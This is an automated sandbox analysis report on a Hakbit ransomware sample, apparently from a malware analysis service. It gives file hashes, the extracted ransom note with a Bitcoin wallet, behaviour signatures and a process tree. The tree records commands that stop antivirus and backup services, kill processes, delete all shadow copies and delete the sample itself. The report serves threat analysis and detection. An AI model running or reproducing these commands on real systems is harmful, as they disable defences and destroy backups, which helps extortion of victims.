Analysis

  • max time kernel
    119s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    31-01-2022 23:06

General

  • Target

    9784148014987a39d87265c015962e9535ed86e861093a6c59691095a19be7c2.exe

  • Size

    199KB

  • MD5

    39c2a62f7024297c25f9a7b4157aba4c

  • SHA1

    30c5c20fbfbd60442b963109ab257ee1969f7f88

  • SHA256

    9784148014987a39d87265c015962e9535ed86e861093a6c59691095a19be7c2

  • SHA512

    502ef61a42a3575227284dcb43b2936772de9f97bec98345f0b9c93ae66c861d451440a07d8f86fb3130d499dc5bc56d3c5398c38346e6b3aa3c7614d9069236

Score
10/10

Malware Config

Extracted

Path

C:\Users\Admin\Desktop\HELP_ME_RECOVER_MY_FILES.txt

Ransom Note
Atention! all your important files were encrypted! to get your files back you have to send Bitcoins and contact us with proof of payment and your Unique Identifier Key. We will send you a decryption tool with your personal decryption password. Where can you buy Bitcoins: https://www.coinbase.com https://localbitcoins.com Contact: [email protected]. Bitcoin wallet to make the transfer to is: 1MYNpqa9CKnjvcvxd25iB7qxxeZbfWsBzP Unique Identifier Key (must be sent to us together with proof of payment): ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ qaHFzfa6ELe2xl5OZYs2CMxo9OKKDQoPIVIVvZHmteoVipmv2mlzUF/G5Jve9aQ4/afebkdEU4OINi9BqaJHdi1ojwxkUqJ3lymlRMZ6ap7OsCStucoEy8QWNlofIF1Ks96WxXiIipnfRfCGmE2xJi7V7plpmzKhDcKLstJQELxvJq3ox44a1oZCZdCtASO7Jvmeu23GnKbZMiSsCgXDZ9CCsuhEqwTcA7exTFDq2pBCSEx8e5MFBpCX7n0FYChT8No2Rf55iWJA9a5VLVTE+xD2xWbbGiAcYBZWixaeIdehyinLybJCMeP4/2i9ibNRTnOOabRjyk4p3QkpVgW4iw== ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ Number of files that you could have potentially lost forever can be as high as: payment): 2
Wallets

1MYNpqa9CKnjvcvxd25iB7qxxeZbfWsBzP

Signatures

  • Hakbit

    Ransomware which encrypts files using AES, first seen in November 2019.

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Deletes itself 1 IoCs
  • Enumerates connected drives 3 TTPs 18 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Suspicious use of SetThreadContext 1 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Interacts with shadow copies 2 TTPs 14 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 3 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 8 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\9784148014987a39d87265c015962e9535ed86e861093a6c59691095a19be7c2.exe
    "C:\Users\Admin\AppData\Local\Temp\9784148014987a39d87265c015962e9535ed86e861093a6c59691095a19be7c2.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1536
    • C:\Users\Admin\AppData\Local\Temp\9784148014987a39d87265c015962e9535ed86e861093a6c59691095a19be7c2.exe
      "C:\Users\Admin\AppData\Local\Temp\9784148014987a39d87265c015962e9535ed86e861093a6c59691095a19be7c2.exe"
      2⤵
        PID:696
      • C:\Users\Admin\AppData\Local\Temp\9784148014987a39d87265c015962e9535ed86e861093a6c59691095a19be7c2.exe
        "C:\Users\Admin\AppData\Local\Temp\9784148014987a39d87265c015962e9535ed86e861093a6c59691095a19be7c2.exe"
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1480
        • C:\Windows\SysWOW64\net.exe
          "net.exe" stop avpsus /y
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1832
          • C:\Windows\SysWOW64\net1.exe
            C:\Windows\system32\net1 stop avpsus /y
            4⤵
              PID:1148
          • C:\Windows\SysWOW64\net.exe
            "net.exe" stop McAfeeDLPAgentService /y
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:1544
            • C:\Windows\SysWOW64\net1.exe
              C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
              4⤵
                PID:432
            • C:\Windows\SysWOW64\net.exe
              "net.exe" stop mfewc /y
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:1460
              • C:\Windows\SysWOW64\net1.exe
                C:\Windows\system32\net1 stop mfewc /y
                4⤵
                  PID:956
              • C:\Windows\SysWOW64\net.exe
                "net.exe" stop BMR Boot Service /y
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:736
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 stop BMR Boot Service /y
                  4⤵
                    PID:1588
                • C:\Windows\SysWOW64\net.exe
                  "net.exe" stop NetBackup BMR MTFTP Service /y
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1404
                  • C:\Windows\SysWOW64\net1.exe
                    C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
                    4⤵
                      PID:1836
                  • C:\Windows\SysWOW64\sc.exe
                    "sc.exe" config SQLTELEMETRY start= disabled
                    3⤵
                      PID:1092
                    • C:\Windows\SysWOW64\sc.exe
                      "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
                      3⤵
                        PID:1072
                      • C:\Windows\SysWOW64\sc.exe
                        "sc.exe" config SQLWriter start= disabled
                        3⤵
                          PID:1132
                        • C:\Windows\SysWOW64\sc.exe
                          "sc.exe" config SstpSvc start= disabled
                          3⤵
                            PID:952
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" /IM mspub.exe /F
                            3⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1468
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" /IM mydesktopqos.exe /F
                            3⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1380
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" /IM mydesktopservice.exe /F
                            3⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2028
                          • C:\Windows\SysWOW64\vssadmin.exe
                            "vssadmin.exe" Delete Shadows /all /quiet
                            3⤵
                            • Interacts with shadow copies
                            PID:1732
                          • C:\Windows\SysWOW64\vssadmin.exe
                            "vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=401MB
                            3⤵
                            • Interacts with shadow copies
                            PID:1536
                          • C:\Windows\SysWOW64\vssadmin.exe
                            "vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=unbounded
                            3⤵
                            • Interacts with shadow copies
                            PID:1564
                          • C:\Windows\SysWOW64\vssadmin.exe
                            "vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=401MB
                            3⤵
                            • Enumerates connected drives
                            • Interacts with shadow copies
                            PID:1040
                          • C:\Windows\SysWOW64\vssadmin.exe
                            "vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=unbounded
                            3⤵
                            • Enumerates connected drives
                            • Interacts with shadow copies
                            PID:1056
                          • C:\Windows\SysWOW64\vssadmin.exe
                            "vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=401MB
                            3⤵
                            • Enumerates connected drives
                            • Interacts with shadow copies
                            PID:1156
                          • C:\Windows\SysWOW64\vssadmin.exe
                            "vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=unbounded
                            3⤵
                            • Enumerates connected drives
                            • Interacts with shadow copies
                            PID:1364
                          • C:\Windows\SysWOW64\vssadmin.exe
                            "vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=401MB
                            3⤵
                            • Enumerates connected drives
                            • Interacts with shadow copies
                            PID:612
                          • C:\Windows\SysWOW64\vssadmin.exe
                            "vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=unbounded
                            3⤵
                            • Enumerates connected drives
                            • Interacts with shadow copies
                            PID:1760
                          • C:\Windows\SysWOW64\vssadmin.exe
                            "vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=401MB
                            3⤵
                            • Enumerates connected drives
                            • Interacts with shadow copies
                            PID:1652
                          • C:\Windows\SysWOW64\vssadmin.exe
                            "vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=unbounded
                            3⤵
                            • Enumerates connected drives
                            • Interacts with shadow copies
                            PID:816
                          • C:\Windows\SysWOW64\vssadmin.exe
                            "vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=401MB
                            3⤵
                            • Enumerates connected drives
                            • Interacts with shadow copies
                            PID:1324
                          • C:\Windows\SysWOW64\vssadmin.exe
                            "vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=unbounded
                            3⤵
                            • Enumerates connected drives
                            • Interacts with shadow copies
                            PID:1532
                          • C:\Windows\SysWOW64\vssadmin.exe
                            "vssadmin.exe" Delete Shadows /all /quiet
                            3⤵
                            • Interacts with shadow copies
                            PID:992
                          • C:\Windows\SysWOW64\notepad.exe
                            "C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\HELP_ME_RECOVER_MY_FILES.txt
                            3⤵
                            • Opens file in notepad (likely ransom note)
                            PID:1612
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\9784148014987a39d87265c015962e9535ed86e861093a6c59691095a19be7c2.exe
                            3⤵
                            • Deletes itself
                            PID:480
                            • C:\Windows\SysWOW64\choice.exe
                              choice /C Y /N /D Y /T 3
                              4⤵
                                PID:872
                        • C:\Windows\system32\vssvc.exe
                          C:\Windows\system32\vssvc.exe
                          1⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1616

                        Network

                        MITRE ATT&CK Enterprise v6

                        Replay Monitor

                        Loading Replay Monitor...

                        Downloads

                        • C:\Users\Admin\Desktop\HELP_ME_RECOVER_MY_FILES.txt

                          MD5

                          ce5a5d3da57ba2c58f9757336c90b781

                          SHA1

                          5d01ca5f821893183c184c35017e09229d8026af

                          SHA256

                          a54bfea20b4c34132fb8dbc7cebf5ab2a79ad14aa52c0853837250e8314405c7

                          SHA512

                          851e2bd2b398880433f793ee9254bf72b4c8a1ca559a87080d97dbfc0648a60967582e61370acbe256d4704f2d4c31b978d36c2123d3c7567b2ff66a911d04de

                        • memory/1480-63-0x0000000000400000-0x0000000000410000-memory.dmp

                          Filesize

                          64KB

                        • memory/1480-59-0x0000000000400000-0x0000000000410000-memory.dmp

                          Filesize

                          64KB

                        • memory/1480-60-0x0000000000400000-0x0000000000410000-memory.dmp

                          Filesize

                          64KB

                        • memory/1480-61-0x0000000000400000-0x0000000000410000-memory.dmp

                          Filesize

                          64KB

                        • memory/1480-62-0x0000000000400000-0x0000000000410000-memory.dmp

                          Filesize

                          64KB

                        • memory/1480-64-0x0000000000400000-0x0000000000410000-memory.dmp

                          Filesize

                          64KB

                        • memory/1480-65-0x0000000076C91000-0x0000000076C93000-memory.dmp

                          Filesize

                          8KB

                        • memory/1480-66-0x0000000000400000-0x0000000000730000-memory.dmp

                          Filesize

                          3.2MB

                        • memory/1536-56-0x00000000003F0000-0x0000000000404000-memory.dmp

                          Filesize

                          80KB

                        • memory/1536-57-0x0000000004B60000-0x0000000004B61000-memory.dmp

                          Filesize

                          4KB

                        • memory/1536-58-0x0000000000430000-0x0000000000446000-memory.dmp

                          Filesize

                          88KB

                        • memory/1536-54-0x0000000000B40000-0x0000000000B78000-memory.dmp

                          Filesize

                          224KB

                        • memory/1536-55-0x00000000002E0000-0x00000000002E6000-memory.dmp

                          Filesize

                          24KB